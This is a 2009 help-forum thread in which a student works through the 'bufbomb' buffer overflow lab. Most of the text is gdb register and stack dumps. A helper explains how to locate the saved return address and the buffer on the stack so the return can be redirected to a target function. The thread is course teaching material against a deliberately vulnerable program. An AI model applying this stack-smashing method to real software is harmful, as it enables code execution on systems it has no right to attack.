(gdb) si
0x08048f7e in test ()
(gdb) info registers
eax            0x1      1
ecx            0xa      10
edx            0x8590c4 8753348
ebx            0x0      0
esp            0xbfffb410       0xbfffb410
ebp            0xbfffb428       0xbfffb428
esi            0x3      3
edi            0x804b018        134524952
eip            0x8048f7e        0x8048f7e <test+30>
eflags         0x282    [ SF IF ]
cs             0x73     115
ss             0x7b     123
ds             0x7b     123
es             0x7b     123
fs             0x0      0
gs             0x33     51
(gdb) 
                                              
1:
2:
3:
4:
5:
6:
7:
8:
9:
10:
11:
12:
13:
14:
15:
16:
17:
18:
19:
20:
21:
22:
23:
24:
25:
26:
27:
28:
29:
30:
31:
32:
33:
34:
35:
36:
37:
38:
39:
40:
41:
42:
43:
44:
45:
46:
47:
48:
49:
50:
51:
52:
53:
54:
55:
56:
57:
58:
59:
60:
61:
62:
63:
64:
65:
66:
67:
68:
69:
70:
71:
72:
73:
74:
75:
76:
77:
78:
79:
80:
81:
82:
83:
84:
85:
86:
87:
88:
89:
90:
91:
92:
93:
94:
95:
96:
97:
98:
99:
100:
101:
102:
103:
104:
105:
106:
107:
108:
109:
110:
111:
112:
113:
114:
115:
116:
117:
118:
119:
120:
121:
122:
123:
124:
125:
126:
127:
128:
129:
130:
131:
132:
133:
134:
135:
136:
137:
138:
139:
140:
141:
142:
143:
144:
145:
146:
147:
148:
149:
150:
151:
152:
153:
154:
155:
156:
157:
158:
159:
160:
161:
162:
163:
164:
165:
166:
167:
168:
169:
170:
171:
172:
173:
174:
175:
176:
177:
178:
179:
180:
181:
182:
183:
184:
185:
186:
187:
188:
189:
190:
191:
192:
193:
194:
195:
196:
197:
198:
199:
200:
201:
202:
203:
204:
205:
206:
207:
208:
209:
210:
211:
212:
213:
214:
215:
216:
217:
218:
219:
220:
221:
222:
223:
224:
225:
226:
227:
228:
229:
230:
231:
232:
233:
234:
235:
236:
237:
238:
239:
240:
241:
242:
243:
244:
245:
246:
247:
248:
249:
250:
251:
252:
253:
254:
255:
256:
257:
258:
259:
260:
261:
262:
263:
264:
265:
266:
267:
268:
269:
270:
271:
272:
273:
274:
275:
276:
277:
278:
279:
280:
281:
282:
283:
284:
285:
286:
287:
288:
289:
290:
291:
292:
293:
294:
295:
296:
297:
298:
299:
300:
301:
302:
303:
304:
305:
306:
307:
308:
309:
310:
311:
312:
313:
314:
315:
316:
317:
318:
319:
320:
321:
322:
323:
324:
325:
326:
327:
328:
329:
330:
331:
332:
333:
334:
335:
336:
337:
338:
339:
340:
341:
342:
343:
344:
345:
346:
347:
348:
349:
350:
351:
352:
353:
354:
355:
356:
357:
358:
359:
360:
361:
362:
363:
364:
365:
366:
367:
368:
369:
370:
371:
372:
373:
374:
375:
376:
377:
378:
379:
380:
381:
382:
383:
384:
385:
386:
387:
388:
389:
390:
391:
392:
393:
394:
395:
396:
397:
398:
399:
400:
401:
402:
403:
404:
405:
406:
407:
408:
409:
410:
411:
412:
413:
414:
415:
416:
417:
418:
419:
420:
421:
422:
423:
424:
425:
426:
427:
428:
429:
430:
431:
432:
433:
434:
435:
436:
437:
438:
439:
440:

Select allOpen in new window

 

by: Infinity08Posted on 2009-10-31 at 11:28:50ID: 25710914

>> how do I know what register the return value is stored?

Are you talking about the return address ? If so, that is not stored in a register - it is stored on the stack (one for each stack frame).

Or are you talking about the function return value. If so, that depends on the calling convention used, and the kind of data returned, but you can usually find it in the eax register. It's not relevant to what you need to do though.

 

by: Infinity08Posted on 2009-10-31 at 11:29:58ID: 25710917

Btw, I notice that you're repeatedly showing the registers ... That will be of very little use for what you need to do. You should be looking at the stack instead, like I've been trying to tell you all along.

 

by: purewinPosted on 2009-10-31 at 11:43:47ID: 25710962

I should step through the code and use the x/nfu addr command to see what is changing?

 

by: Infinity08Posted on 2009-10-31 at 11:52:10ID: 25710999

>> to see what is changing?

On the stack, yes.

That way, you'll get an idea of how each line impacts the contents of the stack, and you'll be able to spot where the buffer is, and where the return address is on the stack.

 

by: purewinPosted on 2009-10-31 at 12:04:56ID: 25711056

Any way you could give an example of what the buffer and return address would look like? I mean I don't really know what it would look like so the stuff I'm looking at isn't making much sense.

 

by: Infinity08Posted on 2009-10-31 at 12:16:40ID: 25711113

You can cross-reference between the stack contents you get from the x/nfu's, and the output of the 'frame' and 'info frame x' (where x is the frame number) gdb functions. Just match the values from the frames with the stack memory dump.

For an idea of the layout of the stack, refer back to the wiki I posted earlier :

        http://en.wikipedia.org/wiki/Call_stack#Structure

 

by: purewinPosted on 2009-10-31 at 22:06:19ID: 25712684

Haha wow I just don't get this....

 

by: Infinity08Posted on 2009-11-01 at 01:04:31ID: 25713073

Which part is it that you don't get ? Did you read up on the call stack ? Did you try to follow along with the code what is happening to the stack ?

 

by: purewinPosted on 2009-11-01 at 13:10:56ID: 25715498

Yes I've read several articles on the call stack and I did try to follow it. I just don't know what I'm looking at/for.

 

by: Infinity08Posted on 2009-11-02 at 07:56:42ID: 25720505

>> I just don't know what I'm looking at/for.

Well, do you understand what the stack does ? Do you understand what a stack frame is ? Do you know what a stack frame contains ? Can you locate the function parameters, and the return address in the stack frame ?

 

by: purewinPosted on 2009-11-02 at 22:01:53ID: 25726370

Okay so I've been looking over this stuff and here is what I think things are correct me if I'm wrong.

(gdb) info frame
Stack level 0, frame at 0xbfffb430:
 eip = 0x8048f57 in getbuf; saved eip 0x8049056
 called by frame at 0xbfffea00
 Arglist at 0xbfffb428, args:
 Locals at 0xbfffb428, Previous frame's sp is 0xbfffb430
 Saved registers:
  ebp at 0xbfffb428, eip at 0xbfffb42c
(gdb) frame 0

>>Locals at 0xbfffb428
Local variables stored here?

>> Saved registers:
 >> ebp at 0xbfffb428, eip at 0xbfffb42c
Return address is ebp?

Assuming I am correct I still do not understand how I would determine the string in which I would have to enter to cause the overflow to where the return address is stored and replace it with smoke()'s address. I know it needs to be x amount of bytes but how would I determine that? I figured out I can get byte infomration using the x/4b address command but I'm not sure what to do with it to get the answer...help? lol

(gdb) run -t jalexanb < exploit-raw.txt
Starting program: /home/jalexanb/lab2/bufbomb -t jalexanb < exploit-raw.txt
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
Team: jalexanb
Cookie: 0x5d5f53de 
Breakpoint 1, 0x08048f79 in test ()
(gdb) backtrace
#0  0x08048f79 in test ()
#1  0x08049056 in launch ()
#2  0x080492b1 in main ()
(gdb) info frame
Stack level 0, frame at 0xbfffb430:
 eip = 0x8048f79 in test; saved eip 0x8049056
 called by frame at 0xbfffea00
 Arglist at 0xbfffb428, args: 
 Locals at 0xbfffb428, Previous frame's sp is 0xbfffb430
 Saved registers:
  ebp at 0xbfffb428, eip at 0xbfffb42c
(gdb) x/4xw 0x08048f79
0x8048f79 <test+25>:    0xffffc2e8      0x8bc289ff      0xef3dfc45      0x74deadbe
(gdb) si
0x08048f40 in getbuf ()
(gdb) backtrace full
#0  0x08048f40 in getbuf ()
No symbol table info available.
#1  0x08048f7e in test ()
No symbol table info available.
#2  0x08049056 in launch ()
No symbol table info available.
#3  0x080492b1 in main ()
No symbol table info available.
(gdb) backtrace
#0  0x08048f40 in getbuf ()
#1  0x08048f7e in test ()
#2  0x08049056 in launch ()
#3  0x080492b1 in main ()
(gdb) frame 0
#0  0x08048f40 in getbuf ()
(gdb) frame 4
#0  0x00000000 in ?? ()
(gdb) x/4xw 0x08048f40
0x8048f40 <getbuf>:     0x83e58955      0x458d18ec      0x240489f4      0xfffe7fe8
(gdb) info frame
Stack level 0, frame at 0x4:
 eip = 0x0; saved eip 0x8048f7e
 Arglist at 0xbfffb408, args: 
 Locals at 0xbfffb408, Previous frame's sp is 0xbfffb410
 Saved registers:
  eip at 0xbfffb40c
(gdb) info frame 1
Stack frame at 0xbfffb430:
 eip = 0x8048f7e in test; saved eip 0x8049056
 called by frame at 0xbfffea00, caller of frame at 0xbfffb410
 Arglist at 0xbfffb428, args: 
 Locals at 0xbfffb428, Previous frame's sp is 0xbfffb430
 Saved registers:
  ebp at 0xbfffb428, eip at 0xbfffb42c
(gdb) info frame 0
Stack frame at 0xbfffb410:
 eip = 0x8048f40 in getbuf; saved eip 0x8048f7e
 called by frame at 0xbfffb430
 Arglist at 0xbfffb408, args: 
 Locals at 0xbfffb408, Previous frame's sp is 0xbfffb410
 Saved registers:
  eip at 0xbfffb40c
(gdb) si
0x08048f41 in getbuf ()
(gdb) backtrace
#0  0x08048f41 in getbuf ()
#1  0x08048f7e in test ()
#2  0x08049056 in launch ()
#3  0x080492b1 in main ()
(gdb) info frame
Stack level 0, frame at 0xbfffb410:
 eip = 0x8048f41 in getbuf; saved eip 0x8048f7e
 called by frame at 0xbfffb430
 Arglist at 0xbfffb408, args: 
 Locals at 0xbfffb408, Previous frame's sp is 0xbfffb410
 Saved registers:
  ebp at 0xbfffb408, eip at 0xbfffb40c
(gdb) frame 0
#0  0x08048f41 in getbuf ()
(gdb) x/4xw 0x08048f41
0x8048f41 <getbuf+1>:   0xec83e589      0xf4458d18      0xe8240489      0xfffffe7f
(gdb) info frame
Stack level 0, frame at 0xbfffb410:
 eip = 0x8048f41 in getbuf; saved eip 0x8048f7e
 called by frame at 0xbfffb430
 Arglist at 0xbfffb408, args: 
 Locals at 0xbfffb408, Previous frame's sp is 0xbfffb410
 Saved registers:
  ebp at 0xbfffb408, eip at 0xbfffb40c
(gdb) si
0x08048f43 in getbuf ()
(gdb) backtrace
#0  0x08048f43 in getbuf ()
#1  0x08048f7e in test ()
#2  0x08049056 in launch ()
#3  0x080492b1 in main ()
(gdb) info frame
Stack level 0, frame at 0xbfffb410:
 eip = 0x8048f43 in getbuf; saved eip 0x8048f7e
 called by frame at 0xbfffb430
 Arglist at 0xbfffb408, args: 
 Locals at 0xbfffb408, Previous frame's sp is 0xbfffb410
 Saved registers:
  ebp at 0xbfffb408, eip at 0xbfffb40c
(gdb) x/4b 0xbfffb410
0xbfffb410:     0x03    0x00    0x00    0x00
(gdb) si
0x08048f46 in getbuf ()
(gdb) backtrace
#0  0x08048f46 in getbuf ()
#1  0x08048f7e in test ()
#2  0x08049056 in launch ()
#3  0x080492b1 in main ()
(gdb) info frame
Stack level 0, frame at 0xbfffb410:
 eip = 0x8048f46 in getbuf; saved eip 0x8048f7e
 called by frame at 0xbfffb430
 Arglist at 0xbfffb408, args: 
 Locals at 0xbfffb408, Previous frame's sp is 0xbfffb410
 Saved registers:
  ebp at 0xbfffb408, eip at 0xbfffb40c
(gdb) si
0x08048f49 in getbuf ()
(gdb) c
Continuing. 
Breakpoint 2, 0x08048f51 in getbuf ()
(gdb) backtrace
#0  0x08048f51 in getbuf ()
#1  0x08048f7e in test ()
#2  0x08049056 in launch ()
#3  0x080492b1 in main ()
(gdb) info frame
Stack level 0, frame at 0xbfffb410:
 eip = 0x8048f51 in getbuf; saved eip 0x8048f7e
 called by frame at 0xbfffb430
 Arglist at 0xbfffb408, args: 
 Locals at 0xbfffb408, Previous frame's sp is 0xbfffb410
 Saved registers:
  ebp at 0xbfffb408, eip at 0xbfffb40c
(gdb) x/4xw 0xbfffb410
0xbfffb410:     0x00000003      0x008584c0      0x08049983      0xbfffb434
(gdb) x/4b 0xbffb410
0xbffb410:      Cannot access memory at address 0xbffb410
(gdb) x/4b 0xbfffb410
0xbfffb410:     0x03    0x00    0x00    0x00
(gdb) si
0x08048f56 in getbuf ()
(gdb) info frame
Stack level 0, frame at 0xbfffb410:
 eip = 0x8048f56 in getbuf; saved eip 0x8048f7e
 called by frame at 0xbfffb430
 Arglist at 0xbfffb408, args: 
 Locals at 0xbfffb408, Previous frame's sp is 0xbfffb410
 Saved registers:
  ebp at 0xbfffb408, eip at 0xbfffb40c
(gdb) backtrace
#0  0x08048f56 in getbuf ()
#1  0x08048f7e in test ()
#2  0x08049056 in launch ()
#3  0x080492b1 in main ()
(gdb) x/4b 0x08048f56
0x8048f56 <getbuf+22>:  0xc9    0xc3    0x90    0x8d
(gdb) si
0x08048960 in alarmhandler ()
(gdb) c
Continuing.
Type string:Dead!: getbuf didn't complete within 600 seconds
Better luck next time 
Program exited normally.
(gdb) Quit
(gdb)
Breakpoint 1, 0x08048f79 in test ()
(gdb) c
Continuing. 
Breakpoint 2, 0x08048f51 in getbuf ()
(gdb) backtrace
#0  0x08048f51 in getbuf ()
#1  0x08048f7e in test ()
#2  0x08049056 in launch ()
#3  0x080492b1 in main ()
(gdb) info frame 0
Stack frame at 0xbfffb410:
 eip = 0x8048f51 in getbuf; saved eip 0x8048f7e
 called by frame at 0xbfffb430
 Arglist at 0xbfffb408, args: 
 Locals at 0xbfffb408, Previous frame's sp is 0xbfffb410
 Saved registers:
  ebp at 0xbfffb408, eip at 0xbfffb40c
(gdb) info frame
Stack level 0, frame at 0xbfffb410:
 eip = 0x8048f51 in getbuf; saved eip 0x8048f7e
 called by frame at 0xbfffb430
 Arglist at 0xbfffb408, args: 
 Locals at 0xbfffb408, Previous frame's sp is 0xbfffb410
 Saved registers:
  ebp at 0xbfffb408, eip at 0xbfffb40c
(gdb) x/4b 0xbfffb408
0xbfffb408:     0x28    0xb4    0xff    0xbf
(gdb) si
0x08048f56 in getbuf ()
(gdb) info frame
Stack level 0, frame at 0xbfffb410:
 eip = 0x8048f56 in getbuf; saved eip 0x8048f7e
 called by frame at 0xbfffb430
 Arglist at 0xbfffb408, args: 
 Locals at 0xbfffb408, Previous frame's sp is 0xbfffb410
 Saved registers:
  ebp at 0xbfffb408, eip at 0xbfffb40c
(gdb) x/4b 0xbfffb410
0xbfffb410:     0x03    0x00    0x00    0x00
(gdb) si
0x08048f57 in getbuf ()
(gdb) backtrace
#0  0x08048f57 in getbuf ()
#1  0x08049056 in launch ()
#2  0x080492b1 in main ()
(gdb) info frame
Stack level 0, frame at 0xbfffb430:
 eip = 0x8048f57 in getbuf; saved eip 0x8049056
 called by frame at 0xbfffea00
 Arglist at 0xbfffb428, args: 
 Locals at 0xbfffb428, Previous frame's sp is 0xbfffb430
 Saved registers:
  ebp at 0xbfffb428, eip at 0xbfffb42c
(gdb) frame 0
#0  0x08048f57 in getbuf ()
(gdb) x/4b 0xbfffb428
0xbfffb428:     0xf8    0xe9    0xff    0xbf
(gdb) x/4b 0xbfffb42c
0xbfffb42c:     0x56    0x90    0x04    0x08
(gdb) si
0x08048f7e in test ()
(gdb) 
                                              
1:
2:
3:
4:
5:
6:
7:
8:
9:
10:
11:
12:
13:
14:
15:
16:
17:
18:
19:
20:
21:
22:
23:
24:
25:
26:
27:
28:
29:
30:
31:
32:
33:
34:
35:
36:
37:
38:
39:
40:
41:
42:
43:
44:
45:
46:
47:
48:
49:
50:
51:
52:
53:
54:
55:
56:
57:
58:
59:
60:
61:
62:
63:
64:
65:
66:
67:
68:
69:
70:
71:
72:
73:
74:
75:
76:
77:
78:
79:
80:
81:
82:
83:
84:
85:
86:
87:
88:
89:
90:
91:
92:
93:
94:
95:
96:
97:
98:
99:
100:
101:
102:
103:
104:
105:
106:
107:
108:
109:
110:
111:
112:
113:
114:
115:
116:
117:
118:
119:
120:
121:
122:
123:
124:
125:
126:
127:
128:
129:
130:
131:
132:
133:
134:
135:
136:
137:
138:
139:
140:
141:
142:
143:
144:
145:
146:
147:
148:
149:
150:
151:
152:
153:
154:
155:
156:
157:
158:
159:
160:
161:
162:
163:
164:
165:
166:
167:
168:
169:
170:
171:
172:
173:
174:
175:
176:
177:
178:
179:
180:
181:
182:
183:
184:
185:
186:
187:
188:
189:
190:
191:
192:
193:
194:
195:
196:
197:
198:
199:
200:
201:
202:
203:
204:
205:
206:
207:
208:
209:
210:
211:
212:
213:
214:
215:
216:
217:
218:
219:
220:
221:
222:
223:
224:
225:
226:
227:
228:
229:
230:
231:
232:
233:
234:
235:
236:
237:
238:
239:
240:
241:
242:

Select allOpen in new window

 

by: Infinity08Posted on 2009-11-02 at 23:23:51ID: 25726651

>> >>Locals at 0xbfffb428
>> Local variables stored here?

Yes, they are inside the stack frame.

>> >> Saved registers:
>>  >> ebp at 0xbfffb428, eip at 0xbfffb42c
>> Return address is ebp?

ebp is the base pointer. This saved value points to the previous stack frame.

The return address is pushed on the stack by the 'call' instruction. With gdb, you can see what happens when stepping over that instruction.

>> I know it needs to be x amount of bytes but how would I determine that?

By looking on the stack, how far your buffer is from the return address.

 

by: purewinPosted on 2009-11-02 at 23:54:37ID: 25726785

So looking from the call to getbuf from test would tell me where on the stack return is initially located? Is return stored as a register or memory address on the stack? I'm not sure what return would look like on the stack or what it would be under when I use info frame. I know where conceptually it is on the stack from your link http://en.wikipedia.org/wiki/Call_stack#Structure but I'm not sure about finding it in practice.

 

by: Infinity08Posted on 2009-11-03 at 00:57:32ID: 25727087

>> So looking from the call to getbuf from test would tell me where on the stack return is initially located?

If you run the code in gdb, and look at the difference of the stack contents before and after the call getbuf instruction, you'll see where the return address is saved, and what it is.


>> Is return stored as a register or memory address on the stack?

You can't store a register on the stack, only values. What you're looking for is an address.


>> I'm not sure what return would look like on the stack or what it would be under when I use info frame.

Don't use info frame - use the x command instead to show the complete and precise contents of the stack.

 

by: purewinPosted on 2009-11-03 at 01:09:58ID: 25727139

I must not be utilizing the x command in the correct way then. Should I not be using it like this?

x/4b address
or
x/4xw address

Depending on which I use I get 4 byte numbers or what looks like 4 hexadecimal addresses. Neither of which look to me like the stack. Is using the x command only going to show me part of the stack? Or should I be able to see the entire stack using it?

 

by: purewinPosted on 2009-11-03 at 01:17:50ID: 25727175

Okay maybe this will help if you can explain what I'm looking at when I use this command and given this example:

gdb) x/4xw 0x08048f79
0x8048f79 <test+25>:    0xffffc2e8      0x8bc289ff      0xef3dfc45      0x74deadbe

what exactly am I looking at here? It looks like the 4th one has had an overflow of what contained dead beef. Other then that I don't get what I'm looking at.

 

by: purewinPosted on 2009-11-03 at 01:38:21ID: 25727272

Do I need to use the
x/b4 address
command at every line where something is changed and then use those values to overflow the smoke() address to where its needed?

 

by: Infinity08Posted on 2009-11-03 at 02:41:37ID: 25727583

>> Neither of which look to me like the stack.

What should the stack look like then ?

The stack is just a region in memory that contains data. You can display the contents of the stack by displaying those data values from that region of memory.


>> Is using the x command only going to show me part of the stack?

The x command is used to examine the value at a certain memory address. If you use a memory address that is inside the stack, then you'll show a value that is on the stack.


>> gdb) x/4xw 0x08048f79
>> 0x8048f79 <test+25>:    0xffffc2e8      0x8bc289ff      0xef3dfc45      0x74deadbe

First of all, get aligned 32 bit values, ie. use addresses that are a multiple of 4 (0x08048f8 eg.).

Second, use an address that is inside the stack (like the stack pointer for example). You'll start seeing some familiar values.

 

by: purewinPosted on 2009-11-03 at 02:48:12ID: 25727613

How do I know if it's on the stack then? The address that is. I feel like my problem is not being able to recognize the stack and stuff in it when I see it. I understand what it looks like in diagrams and figures and what not but translating that into what it looks like through code/debugger or whatever isn't clicking. Do you have any examples or something I just need some kind of idea on what I'm looking for looks like.

 

by: Infinity08Posted on 2009-11-03 at 03:23:33ID: 25727796

>> How do I know if it's on the stack then? The address that is.

As I said (http:#25709275 for example) : use the stack pointer (esp).

        x/4xw $sp

for example shows the 4 32bit values at the top of the stack.

 

by: purewinPosted on 2009-11-03 at 03:44:09ID: 25727936

Okay I THINK I've got atleast the location to which I need to overflow to. Is the locatin of 0xdeadbeef where I need to insert the address for smoke?

gdb) x/32xw $sp
0xbfffb40c:     0x08048f7e      0x00000003      0x008584c0      0x08049983
0xbfffb41c:     0xbfffb434      0xbfffb434      0xdeadbeef      0xbfffe9f8
0xbfffb42c:     0x08049056      0x08049983      0x000000f4      0x00003560
0xbfffb43c:     0x00000000      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
0xbfffb44c:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
0xbfffb45c:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
0xbfffb46c:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
0xbfffb47c:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
(gdb) 

Breakpoint 3, 0x08048f79 in test ()
(gdb) x/4xw $sp
0xbfffb410:     0x00000003      0x008584c0      0x08049983      0xbfffb434
(gdb) info frame
Stack level 0, frame at 0xbfffb430:
 eip = 0x8048f79 in test; saved eip 0x8049056
 called by frame at 0xbfffea00
 Arglist at 0xbfffb428, args: 
 Locals at 0xbfffb428, Previous frame's sp is 0xbfffb430
 Saved registers:
  ebp at 0xbfffb428, eip at 0xbfffb42c
(gdb) x/8xw $sp
0xbfffb410:     0x00000003      0x008584c0      0x08049983      0xbfffb434
0xbfffb420:     0xbfffb434      0xdeadbeef      0xbfffe9f8      0x08049056
(gdb) x/32xw $sp
0xbfffb410:     0x00000003      0x008584c0      0x08049983      0xbfffb434
0xbfffb420:     0xbfffb434      0xdeadbeef      0xbfffe9f8      0x08049056
0xbfffb430:     0x08049983      0x000000f4      0x00003560      0x00000000
0xbfffb440:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
0xbfffb450:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
0xbfffb460:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
0xbfffb470:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
0xbfffb480:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
(gdb) si
0x08048f40 in getbuf ()
(gdb) x/32xw $sp
0xbfffb40c:     0x08048f7e      0x00000003      0x008584c0      0x08049983
0xbfffb41c:     0xbfffb434      0xbfffb434      0xdeadbeef      0xbfffe9f8
0xbfffb42c:     0x08049056      0x08049983      0x000000f4      0x00003560
0xbfffb43c:     0x00000000      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
0xbfffb44c:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
0xbfffb45c:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
0xbfffb46c:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
0xbfffb47c:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
(gdb) si
0x08048f41 in getbuf ()
(gdb) x/32xw $sp
0xbfffb408:     0xbfffb428      0x08048f7e      0x00000003      0x008584c0
0xbfffb418:     0x08049983      0xbfffb434      0xbfffb434      0xdeadbeef
0xbfffb428:     0xbfffe9f8      0x08049056      0x08049983      0x000000f4
0xbfffb438:     0x00003560      0x00000000      0xf4f4f4f4      0xf4f4f4f4
0xbfffb448:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
0xbfffb458:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
0xbfffb468:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
0xbfffb478:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
(gdb) c
Continuing. 
Breakpoint 4, 0x08048f51 in getbuf ()
(gdb) x/32xw $sp
0xbfffb3f0:     0xbfffb3fc      0x00000000      0x0804a108      0x04084002
0xbfffb400:     0x0000908d      0x00000003      0xbfffb428      0x08048f7e
0xbfffb410:     0x00000003      0x008584c0      0x08049983      0xbfffb434
0xbfffb420:     0xbfffb434      0xdeadbeef      0xbfffe9f8      0x08049056
0xbfffb430:     0x08049983      0x000000f4      0x00003560      0x00000000
0xbfffb440:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
0xbfffb450:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
0xbfffb460:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
(gdb) si
0x08048f56 in getbuf ()
(gdb) si
0x08048f57 in getbuf ()
(gdb) x/32xw $sp
0xbfffb40c:     0x08048f7e      0x00000003      0x008584c0      0x08049983
0xbfffb41c:     0xbfffb434      0xbfffb434      0xdeadbeef      0xbfffe9f8
0xbfffb42c:     0x08049056      0x08049983      0x000000f4      0x00003560
0xbfffb43c:     0x00000000      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
0xbfffb44c:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
0xbfffb45c:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
0xbfffb46c:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
0xbfffb47c:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
(gdb) 
                                              
1:
2:
3:
4:
5:
6:
7:
8:
9:
10:
11:
12:
13:
14:
15:
16:
17:
18:
19:
20:
21:
22:
23:
24:
25:
26:
27:
28:
29:
30:
31:
32:
33:
34:
35:
36:
37:
38:
39:
40:
41:
42:
43:
44:
45:
46:
47:
48:
49:
50:
51:
52:
53:
54:
55:
56:
57:
58:
59:
60:
61:
62:
63:
64:
65:
66:
67:
68:
69:
70:
71:
72:

Select allOpen in new window

 

by: purewinPosted on 2009-11-03 at 04:33:22ID: 25728260

Does the text I attached make sense to you? What exactly do I need to pass as input? Bytes? A regular string?

Your exploit strings will typically contain byte values that do not correspond to the ASCII values for printing characters. The program sendstring can help you generate these raw strings. It takes as input a hex-formatted string. In this format, each byte value is represented by two hex digits. For example, the string 012345 could be entered in hex format as 30 31 32 33 34 35. (Recall that the ASCII code for decimal digit x is 0x3x.) Non-hex digit characters are ignored, including the blanks in the example shown.

                                              
1:

Select allOpen in new window

 

by: purewinPosted on 2009-11-03 at 04:34:17ID: 25728273

EDIT: I don't know what happened to the text I just posted here it is again.

Your exploit strings will typically contain byte values that do not correspond to the ASCII values for printing characters. The program sendstring can help you generate these raw strings. It takes as input a hex-formatted string. In this format, each byte value is represented by two hex digits. For example, the string 012345 could be entered in hex format as 30 31 32 33 34 35. (Recall that the ASCII code for decimal digit x is 0x3x.) Non-hex digit characters are ignored, including the blanks in the example shown.

 

by: purewinPosted on 2009-11-03 at 04:58:26ID: 25728432

Never mind about deadbeef being the return address. The first thing pushed onto the stack once a function is called is the return address correcT? If so then:

Breakpoint 1, 0x08048f79 in test ()
(gdb) x/32xw $sp
0xbfffb410:     0x00000003      0x008584c0      0x08049983      0xbfffb434
0xbfffb420:     0xbfffb434      0xdeadbeef      0xbfffe9f8      0x08049056
0xbfffb430:     0x08049983      0x000000f4      0x00003560      0x00000000

is what the stack looks like before the call to getbuf and

0xbfffb40c:     0x08048f7e      0x00000003      0x008584c0      0x08049983
0xbfffb41c:     0xbfffb434      0xbfffb434      0xdeadbeef      0xbfffe9f8
0xbfffb42c:     0x08049056      0x08049983      0x000000f4      0x00003560
0xbfffb43c:     0x00000000

is what the stack looks like once getbuf is entered and the first thing to change is a push of 0x08048f7e onto the top of the stack which should be the return address! Right? Hope so. If it is where do I go from here....

 

by: Infinity08Posted on 2009-11-03 at 05:04:50ID: 25728484

>> Is the locatin of 0xdeadbeef where I need to insert the address for smoke?

You'll notice that 0xdeadbeef is a local variable in the test function.


If you look at the start of the test function, you see :

>> 0x08048f60 <test+0>:    push   %ebp

the previous base pointer (ebp) is pushed onto the stack.

>> 0x08048f61 <test+1>:    mov    %esp,%ebp

Doesn't impact the stack.

>> 0x08048f63 <test+3>:    sub    $0x18,%esp

adds room for 6 local 32bit values onto the stack.

>> 0x08048f66 <test+6>:    movl   $0xdeadbeef,0xfffffffc(%ebp)

places the value 0xdeadbeef in the first one of those 6 32bit values.

So, you should have this on the stack (stack growing up) :

        local variable : ???
        local variable : ???
        local variable : ???
        local variable : ???
        local variable : ???
        local variable : 0xdeadbeef
        saved ebp
        return address
        ...

Can you see what's what now ?

 

by: Infinity08Posted on 2009-11-03 at 05:07:43ID: 25728512

>> Never mind about deadbeef being the return address. The first thing pushed onto the stack once a function is called is the return address correcT?

That's right. The moment of the call instruction, the return address is pushed on the stack, and then the instructions of the function are executed one by one.


>> is what the stack looks like once getbuf is entered and the first thing to change is a push of 0x08048f7e onto the top of the stack which should be the return address! Right?

That's correct. You'll notice that 0x08048f7e is the address of the instruction right after the call getbuf instruction :

>> 0x08048f79 <test+25>:   call   0x8048f40 <getbuf>
>> 0x08048f7e <test+30>:   mov    %eax,%edx


>> If it is where do I go from here....

Now, you have to find where the buffer is placed on the stack. Once you have its location, you know how far you have to overflow the buffer to overwrite the return address.

 

by: purewinPosted on 2009-11-03 at 05:12:12ID: 25728545

and to find where the buffer is at i should step through the code to the return in getbuf?

 

by: Infinity08Posted on 2009-11-03 at 05:18:08ID: 25728590

>> and to find where the buffer is at i should step through the code to the return in getbuf?

You should step through the code to where the buffer is used.

getbuf calls Gets internally, which takes a string as input from the user, and places it at the address 0xfffffff4(%ebp), since that's what's being passed as parameter to Gets.

 

by: Infinity08Posted on 2009-11-03 at 05:18:51ID: 25728595

Basically, simply step through the code in the debugger, until you're asked to enter a string, enter a string, and see where it ends up on the stack ...

 

by: purewinPosted on 2009-11-03 at 05:28:59ID: 25728667

do i simply type the memory address for smoke() to call it?

 

by: purewinPosted on 2009-11-03 at 05:37:54ID: 25728748

Okay so the string I entered was test and here is what I have. It seems the string was entered after 0x0804a108 and I need smoke() to be at 0x08048f7e. How do I determine what I need to enter from this? Do I need to convert the four addresses to bytes and pass the bytes as the string?

(gdb) x/32xw $sp
0xbfffb3f0:     0xbfffb3fc      0x00000000      0x0804a108      0xbfffb434
0xbfffb400:     0x00857ff4      0x00000003      0xbfffb428      0x08048f7e
0xbfffb410:     0x00000003      0x008584c0      0x08049983      0xbfffb434
